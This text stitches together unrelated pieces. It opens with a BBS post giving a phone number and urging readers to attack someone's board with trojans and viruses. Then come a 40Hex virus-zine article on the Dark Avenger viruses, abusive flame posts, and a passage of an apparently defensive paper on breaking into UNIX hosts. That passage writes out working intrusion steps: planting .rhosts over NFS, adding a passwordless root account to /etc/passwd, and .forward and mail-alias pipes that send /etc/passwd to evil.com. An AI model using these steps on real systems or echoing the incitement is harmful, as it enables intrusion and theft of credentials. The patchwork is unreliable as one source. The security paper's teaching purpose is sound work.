Anyone out there who wants to make some dicks day, call this
assholes cheap BBS and lets take him down. The number is
(212)-889-6438. Trojans, Ansi-Bombs, and all Viruses are acepted.
Go to it!
--
Si
Smaug
40Hex Volume 1 Issue 2 0005
The Dark Avenger
--- ---- -------
Part I. The Dark Avenger
-------------------------
Introduction:
The following text file was sent directly to Professor
Vesselin Bontchev in a public sent to an anti-viral board
located in Sofia, Bulgaria.
Bontchev is one of the leading anti-viral researchers in
Europe today. A producer of number of effective anti-viral
programs in Bulgaria, his programs are widely used throughout
Europe.
The Dark Avenger is Bulgaria's most dangerous viral code
writer and a heavy metal fanatic - as this message concerning
himself, written by him (often referring to himself in third
person) reveals:
----------------
DARK AVENGER
============
DARK AVENGER is the pseudonym used by a particularly prolific and
malicious Bulgarian virus writer. It is also the name given in the
West to some of his earlier viruses. His viruses include:
DARK AVENGER V651, V1800, V2000 and V2100
NUMBER OF THE BEAST aka 512 (several versions)
ANTHRAX (Infects both files and boot sectors)
V800 and its derivatives: 1226, PROUD, EVIL & PHOENIX
Some other viruses, e.g. NOMENKLATURA & DIAMOND are in his style but
are believed to be the work of others. MURPHY has been strongly
influenced by him but is known to be of different authorship.
CRAZY EDDIE may also be his.
Several 'hacks' are now appearing of V1800, V2100, MURPHY and
DIAMOND.
************* more **********
Eddie is the mascot of the British heavy metal group, Iron Maiden
(hence 'up the irons'). It is a 20 foot high skeleton that appears
on stage with them and is featured on the sleeves of all their
albums.
Anthrax and Damage Inc are other heavy metal groups whose names have
been featured in some Dark Avenger viruses. Iron Maiden numbers have
also been mentioned including 'Somewhere in Time', 'Only the Good Die
Young' and 'Number of the Beast'.
************** more **********
Unusually, this virus writer has also produced a virus removal
program together with a version log of his EDDIE series, as
reproduced below with its original spelling and grammar.
"DOCTOR QUICK! Virus Doctor for the Eddie Virus Version 2.01
10-31-89 Copyright (c) 1988-89 Dark Avenger. All rights reserved.
DOCTOR /? for help
It may be of interest to you to know that Eddie (also known as "Dark
Avenger") is the most widespread virus in Bulgaria for the time
being. However I have information that Eddie is well known in the
USA, West Germany and USSR too.
I started in writing the virus in early September 1988. In those
times there were no any viruses in Bulgaria, so I decided to write
the first Bulgarian virus. There were some different Eddie's
versions:
VERSION 1.1, 16-DEC-1988
In December I've decided to enhance the virus. This version could
infect files during their opening. For that reason, a read buffer
was allocated in high end of memory, rather than using DOS function
48h when needed. The disk was destroyed instead of the infected
files.
VERSION 1.2, 19-DEC-1988
This added a new feature that causes (for example) compiled programs
to be infected at once if the virus is resident. Also, the "Eddie
lives..." message was added (can you guess why exactly "Eddie"?)
VERSION 1.31, 3-JAN-1989
This became the most common version of Eddie. A code was added to
find the INT 13 rom-vector on many popular XT's and AT's. Also,
other messages were added so its length would be exactly 1800 bytes.
There was a subsequent, 1.32 version (19-JAN-1989), which added
self-checksum and other interesting features that was abandoned
because it was extremely buggy.
In early March 1989 version 1.31 was called into existence and
started to live its own life to all engineers' and other suckers'
terror. And, the last
VERSION 1.4, 17-OCT-1989
This was a bugfix for version 1.31, and added some interesting new
features. Support has been added for DOS 2.x and DOS 4.x. For
further information about this (the most terrible) version, and to
learn how to find out a program author by its code, or why
virus-writers are still not dead, contact Mr. Vesselin Bontchev (All
Rights Reserved).
So, never say die! Eddie lives on and on and on... Up the irons!"
NOTE:
Vesselin Bontchev, who the Dark Avenger is trying to discredit, is a
leading virus researcher at the Bulgarian Academy of Sciences.
Post Note:
There is a rumor concerning the fact that RABID now has
the Dark Avenger on their staff of virus writers, and that
the new Dark Avenger variant released by them was, in fact,
written by him. This has yet to be proven.
The more acceptable belief concerning this new strain
is that RABID simply picked up the source code for Dark Avenger,
released last December, and modified it.
Part II - Dark Avenger - Strain A
-----------------------
Vesselin Bontchev reports in May 1990:
The Dark Avenger virus.
======================
- I found two new mutations of this virus. Well, maybe
"mutations" is not the correct word. In the first of them, the
first 16 characters of the string "Eddie lives... somewhere in
time!" were replaced with blanks.
In the second example, all strings (the message above, the
copyright message and the "Diana P." string) were replaced with
blanks. - The author of the Dark Avenger virus (The bastard! I
still cannot determine who he is.) has released the source code
of his virus.
It is full with ironic comments about me. Of course, now we have
to expect lots of new, similar viruses to appear. At least, this
leaded to one good thing - the source helped me very much in
disassembling the V2000 virus. - I received a rather offensive
anonymous letter from this person. In it he claims to be also
the author of both the V2000 (I trust this) and the Number of the
Beast viruses (the latter is unlikely). [See Above]
Information About the Dark Avenger Virus, courtesy of
"Virus Bulletin Ltd," Buckinghamshire, England.
Note:
This information is far more valuable than the standard
Virus Summary by Patricia Hoffman. Her entry concerning DA
fails to go into more depth about the Dark Avenger virus and
apparently she has yet to receive information of the
different versions of DA. Such information is already a year
old, but she has yet to include it.
Entry...............: Dark Avenger
Alias(es)...........: ---
Virus Strain........: Dark Avenger
Virus detected when.: November 1989
where.: USA
Classification......: February 1990
Length of Virus.....: about 1800 Bytes
--------------------- Preconditions -----------------------------------
Operating System(s).: DOS
Version/Release.....:
Computer model(s)...: IBM-compatible
--------------------- Attributes --------------------------------------
Easy Identification.: Two Texts:
"Eddie lives...somewhere in time" at beginning
and
"This Program was written in the City of Sofia
(C) 1988-89 Dark Avenger" near end of file
Type of infection...: Link-virus
COM-files: appends to the program and installs a
short jump
EXE-files: appends to the program at the
beginning of the next paragraph
Infection Trigger...: COM and EXE files are corrupted on any read
attempt even when VIEWING!!!
Storage media affected: Any Drive
Interrupts hooked...: Int 21 DOS-services
Int 27 Terminate and Stay Resident
Damage..............: Overwrites a random sector with bootblock
Damage Trigger......: each 16th infection; counter located in
Bootblock
Particularities.....: -
Similarities........: -
--------------------- Agents ------------------------------------------
Countermeasures.....: NONE! All data can be destroyed !!!!
There is no way in retrieving lost data.
Backups will most probably be destroyed too.
Countermeasures successful: install McAfee's SCANRES.
Standard means......: Good luck! Hopefully the virus did not destroy
too many of your programs and data.
--------------------- Acknowledgement ---------------------------------
Location............: VTC Uni Hamburg
Classification by...: Matthias Jaenichen
Documentation by....: Matthias Jaenichen
Date................: 31.01.1990
Part III - DARK AVENGER 2000
=================
Date: 02 Feb 90 10:49:00 +0700
From: Vesselin Bontchev
This virus is also "made in Bulgaria" and again I am indirectly the
cause of its creation. I am a well known "virus-buster" in Bulgaria
and my antivirus programs are very widely used. Of course, virus
designers didn't like it. So their next creation... causes trouble
to my antivirus programs.
This virus is exactly 2000 bytes long and I think that it was
created by the author of the Eddie (Dark Avenger) virus. The
programming style is the same and there are even pieces of code
which are the same.
The virus acts much like the Eddie one --- it installs resident in
memory by manipulating the memory control blocks; infects
COMMAND.COM at the first run; infects both .COM- and .EXE-files;
infects files when one executes them as well as when one copies
them.
However, there are some extras added. First, the virus is able to
fetch the original INT 13h vector just like the V512 one (by using
the same undocumented function --- tricks spread fast between virus
programmers).
Second, it intercepts the find-first (FCB) and find-next (FCB)
functions --- just like V651 (aka EDDIE II) (and contains the same
bugs), so you won't see the increased file lengths in the listing
displayed by the DIR command.
Third, it contains the string "Copyright (C) 1989 by Vesselin
Bontchev", so people may think that I am the author of this virus.
In fact, the virus searches every program being executed for this
string (the case of the letters does not matter) and if found,
hangs the system. It is not necessary to tell you that all my
antivirus programs contain this string. Of course, now I will have
to use some kind of encryption, just to prevent such tricks.
Vesselin Bontchev reported in May 1990:
The V2000 virus (DARK AVENGER 2000)
===================================
- It turned out that the example of this virus I sent to some of
the antivirus researchers was not the original version. The
original contains the string "Only the Good die young..."
instead of the "Copy me - I want to travel" message. Also a
small piece of code in the original version was patched to
contain the "666" string. (That is, the version you have contains
this string, the original does not.)
- There exists also a small mutation of the version you have.
The only difference is that the `C' character in the word "Copy"
was changed to `Z'.
- When describing the V2000 virus, I stated that it halts the
computer if you run a program which contains the string
"Copyright (c) 1989 by Vesselin Bontchev". This is not quite
correct. In fact, the programs are only checked for the "Vesselin
Bontchev" part of the string.
- I obtained John McAfee's program Clean, version 60. In the
accompanying documentation he states about the V2000 virus that
"The virus is very virulent and has caused system crashes and
lost data, as well as causing some systems to become non-bootable
after infection". This is not very correct, or at least, there
is much more to be said. The virus is exactly as virulent as the
Dark Avenger virus, and for the same reason. It infects files
not only when one executes them, but also when one reads or
copies them. This is achieved exactly in the same manner as in
the Dark Avenger. The systems become non-bootable when the virus
infects the two hidden files of the operating system - it cannot
distinguish them from the regular .COM files. By the way, the
Dark Avenger virus often causes the same effect. And at last,
but not least (:-)), the virus is highly destructive - just as
the Dark Avenger is. It destroys the information on a randomly
selected sector on the disk once in every 16 runs of an infected
program. The random function is exactly the same, and the
counters (0 to 15 and for the last attacked sector) are exactly
the same and on the same offsets in the boot sector as with the
Dark Avenger virus. The main difference is that the destroyed
sector is overwritten not with a part of the virus body, but with
the boot sector instead. This makes a bit more difficult to
discover which files are destroyed - the boot sector is contained
in many "good" programs, such as FORMAT, SYS, NDD. Also, the
nastiest thing - the damage function is not performed via INT 26h
(which can be intercepted). The virus determines the address of
the device driver for the respective disk unit (using an
undocumented DOS function call, of course. I begin to wonder if
Ralf Brown did any good when he made the information in the
INTERxyy file available :-)). Then it performs a direct call to
that address. The device driver in DOS does its work and issues
the appropriate INT 13h. However the virus has scanned the
controllers' ROM space and has determined the original address of
the interrupt handler - just as the Dark Avenger virus does.
Then it has temporary replaced the INT 13h vector with the
address of this handler. The result is that the damage function
cannot be intercepted.
- Also this virus (unlike Dark Avenger) supports PC-DOS version
4.0 and will work (and infect) under it.
- The bytes 84 A8 A0 AD A0 20 8F 2E in the virus body are the
name "Diana P.", this time written in cyrillics.
Unknown Source
--
Si
nyarl-tep
like i said
keyboard hero
you dont have shit
cant do shit
and wont do shit
go kiss archangel's ass a little more
i dont think you sig says enough
how bout becoming his life mate
and pleasuring him with that wrinkled rosebud
you mom called an ass
undo
Smaug wrote:
>
> Yup, thats right, no more AA posts allowed.
> --
You know what I'm sick of seeing? "Apple's Big Mistake" and "Windows
vs. Linux." Could you take care of those, too, while you're at it?
Ordinarily I would get pissed at somebody trying to control the content
of this group, but you are including your Obhack, as it were, so I'm
really ok with what you're doing.
I'm afraid you've taken on a big job for yourself, though, in case
somebody wants to fight what you're doing. It would be ridiculously
easy to keep you working incessantly to stop a purposely, exponentially
branching thread.
And then there's the "Smaug vs the Archangel Threads" thread, and then I
guess there would be the "Smaug vs the Smaug vs the Archangel Threads
Thread" thread.
I think you need to chill.
Smaug
Introduction
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login Home-dir Shell Last login, from where
----- -------- ----- ----------------------
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.com csh -i" is used
to initially get onto the system because it doesn't leave any traces in
the wtmp or utmp system auditing files, making the rsh invisible for
finger and who. The remote shell isn't attached to a pseudo-terminal,
however, so that screen-oriented programs such as pagers and editors
will fail -- but it is very handy for brief exploration.
The COPS security auditing tool (see appendix D) will report key files
or directories that are writable to accounts other than the
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
file permission problems. On many systems, rsh probes as shown above,
even when successful, would remain completely unnoticed; the tcp wrapper
(appendix D), which logs incoming connections, can help to expose such
activities.
----
What now? Have you uncovered all the holes on your target system? Not
by a long shot. Going back to the finger results on your target, you
notice that it has an "ftp" account, which usually means that anonymous
ftp is enabled. Anonymous ftp can be an easy way to get access, as it
is often misconfigured. For example, the target may have a complete
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
instead of a stripped down version. In this example, thfinger ough, you see
that the latter doesn't seem to be true (how can you tell without
actually examining the file?) However, the home directory of ftp on
victim.com is writable. This allows you to remotely execute a command
-- in this case, mailing the password file back to yourself -- by the
simple method of creating a .forward file that executes a command when
mail is sent to the ftp account. This is the same mechanism of piping
mail to a program that the "vacation" program uses to automatically
reply to mail messages.
evil % cat forward_sucker_file
"|/bin/mail z...@evil.com < /etc/passwd"
evil % ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -lga
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
total 5
drwxr-xr-x 4 101 1 512 Jun 20 1991 .
drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
226 ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
evil % echo test | mail f...@victim.com
Now you simply wait for the password file to be sent back to you.
The security auditing tool COPS will check your anonymous ftp setup; see
the man page for ftpd, the documentation/code for COPS, or CERT advisory
93:10 for information on how to set up anonymous ftp correctly.
Vulnerabilities in ftp are often a matter of incorrect ownership or
permissions of key files or directories. At the very least, make sure
that ~ftp and all "system" directories and files below ~ftp are owned by
root and are not writable by any user.
While looking at ftp, you can check for an older bug that was once
widely exploited:
% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)
If this works, you now are logged in as root, and able to modify the
password file, or whatever you desire. If your system exhibits this
bug, you should definitely get an update to your ftpd daemon, either
from your vendor or (via anon ftp) from ftp.uu.net.
The wuarchive ftpd, a popular replacement ftp daemon put out by the
Washington University in Saint Louis, had almost the same problem. If
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
more recent version.
Finally, there is a program vaguely similar to ftp -- tftp, or the
trivial file transfer program. This daemon doesn't require any password
for authentication; if a host provides tftp without restricting the
access (usually via some secure flag set in the inetd.conf file), an
attacker can read and write files anywhere on the system. In the
example, you get the remote password file and place it in your local
/tmp directory:
evil % tftp
tftp> connect victim.com
tftp> get /etc/passwd /tmp/passwd.victim
tftp> quit
For security's sake, tftp should not be run; if tftp is necessary, use
the secure option/flag to restrict access to a directory that has no
valuable information, or run it under the control of a chroot wrapper
program.
----
If none of the previous methods have worked, it is time to go on to more
drastic measures. You have a friend in rpcinfo, another very handy
program, sometimes even more useful than finger. Many hosts run RPC
services that can be exploited; rpcinfo can talk to the portmapper and
show you the way. It can tell you if the host is running NIS, if it is
a NIS server or slave, if a diskless workstation is around, if it is
running NFS, any of the info services (rusersd, rstatd, etc.), or any
other unusual programs (auditing or security related). For instance,
going back to our sample target:
evil % rpcinfo -p victim.com [output trimmed for brevity's sake]
program vers proto port
100004 2 tcp 673 ypserv
100005 1 udp 721 mountd
100003 2 udp 2049 nfs
100026 1 udp 733 bootparam
100017 1 tcp 1274 rexd
In this case, you can see several significant facts about our target;
first of which is that it is an NIS server. It is perhaps not widely
known, but once you know the NIS domainname of a server, you can get any
of its NIS maps by a simple rpc query, even when you are outside the
subnet served by the NIS server (for example, using the YPX program that
can be found in the comp.sources.misc archives on ftp.uu.net). In
addition, very much like easily guessed passwords, many systems use
easily guessed NIS domainnames. Trying to guess the NIS domainname is
often very fruitful. Good candidates are the fully and partially
qualified hostname (e.g. "victim" and "victim.com"), the organization
name, netgroup names in "showmount" output, and so on. If you wanted to
guess that the domainname was "victim", you could type:
evil % ypwhich -d victim victim.com
Domain victim not bound.
This was an unsuccessful attempt; if you had guessed correctly it would
have returned with the host name of victim.com's NIS server. However,
note from the NFS section that victim.com is exporting the "/var"
directory to the world. All that is needed is to mount this directory
and look in the "yp" subdirectory -- among other things you will see
another subdirectory that contains the domainname of the target.
evil # mount victim.com:/var /foo
evil # cd /foo
evil # /bin/ls -alg /foo/yp
total 17
1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
[...]
In this case, "foo_bar" is the NIS domain name.
In addition, the NIS maps often contain a good list of user/employee
names as well as internal host lists, not to mention passwords for
cracking.
Appendix C details the results of a case study on NIS password files.
----
You note that the rpcinfo output also showed that victim.com runs rexd.
Like the rsh daemon, rexd processes requests of the form "please execute
this command as that user". Unlike rshd, however, rexd does not care if
the client host is in the hosts.equiv or .rhost files. Normally the rexd
client program is the "on" command, but it only takes a short C program
to send arbitrary client host and userid information to the rexd server;
rexd will happily execute the command. For these reasons, running rexd
is similar to having no passwords at all: all security is in the client,
not in the server where it should be. Rexd security can be improved
somewhat by using secure RPC.
----
While looking at the output from rpcinfo, you observe that victim.com
also seems to be a server for diskless workstations. This is evidenced
by the presence of the bootparam service, which provides information to
the diskless clients for booting. If you ask nicely, using
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
its NIS domainname. This can be very useful when combined with the fact
that you can get arbitrary NIS maps (such as the password file) when you
know the NIS domainname. Here is a sample code snippet to do just that
(bootparam is part of SATAN.)
char *server;
struct bp_whoami_arg arg; /* query */
struct bp_whoami_res res; /* reply */
/* initializations omitted... */
callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);
printf("%s has nisdomain %s\n", server, res.domain_name);
The showmount output indicated that "easy" is a diskless client of
victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
query:
evil % bootparam victim.com easy.victim.com
victim.com has nisdomain foo_bar
----
NIS masters control the mail aliases for the NIS domain in question.
Just like local mail alias files, you can create a mail alias that will
execute commands when mail is sent to it (a once popular example of this
is the "decode" alias which uudecodes mail files sent to it.) For
instance, here you create an alias "foo", which mails the password file
back to evil.com by simply mailing any message to it:
nis-master # echo 'foo: "| mail z...@evil.com < /etc/passwd "' >> /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v f...@victim.com
Hopefully attackers won't have control of your NIS master host, but even
more hopefully the lesson is clear -- NIS is normally insecure, but if
an attacker has control of your NIS master, then s/he effectively has
control of the client hosts (e.g. can execute arbitrary commands).
There aren't many effective defenses against NIS attacks; it is an
insecure service that has almost no authentication between clients and
servers. To make things worse, it seems fairly clear that arbitrary
maps can be forced onto even master servers (e.g., it is possible to
treat an NIS server as a client). This, obviously, would subvert the
entire schema. If it is absolutely necessary to use NIS, choosing a
hard to guess domainname can help slightly, but if you run diskless
clients that are exposed to potential attackers then it is trivial for
an attacker to defeat this simple step by using the bootparam trick to
get the domainname. If NIS is used to propagate the password maps, then
shadow passwords do not give additional protection because the shadow
map is still accessible to any attacker that has root on an attacking
host. Better is to use NIS as little as possible, or to at least
realize that the maps can be subject to perusal by potentially hostile
forces.
Secure RPC goes a long way to diminish the threat, but it has its own
problems, primarily in that it is difficult to administer, but also in
that the cryptographic methods used within are not very strong. It has
been rumored that NIS+, Sun's new network information service, fixes
some of these problems, but until now it has been limited to running on
Suns, and thus far has not lived up to the promise of the design.
Finally, using packet filtering (at the very least port 111) or
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
all can help.
----
The portmapper only knows about RPC services. Other network services
can be located with a brute-force method that connects to all network
ports. Many network utilities and windowing systems listen to specific
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
usually on port 6000, etc.) SATAN includes a program that scans the
ports of a remote hosts and reports on its findings; if you run it
against our target, you see:
evil % tcpmap victim.com
Mapping 128.128.128.1
port 21: ftp
port 23: telnet
port 25: smtp
port 37: time
port 79: finger
port 512: exec
port 513: login
port 514: shell
port 515: printer
port 6000: (X)
This suggests that victim.com is running X windows. If not protected
properly (via the magic cookie or xhost mechanisms), window displays can
be captured or watched, user keystrokes may be stolen, programs executed
remotely, etc. Also, if the target is running X and accepts a telnet to
port 6000, that can be used for a denial of service attack, as the
target's windowing system will often "freeze up" for a short period of
time. One method to determine the vulnerability of an X server is to
connect to it via the XOpenDisplay() function; if the function returns
NULL then you cannot access the victim's display (opendisplay is part of
SATAN):
char *hostname;
if (XOpenDisplay(hostname) == NULL) {
printf("Cannot open display: %s\n", hostname);
} else {
printf("Can open display: %s\n", hostname);
}
evil % opendisplay victim.com:0
Cannot open display: victim.com:0
X terminals, though much less powerful than a complete UNIX system, can
have their own security problems. Many X terminals permit unrestricted
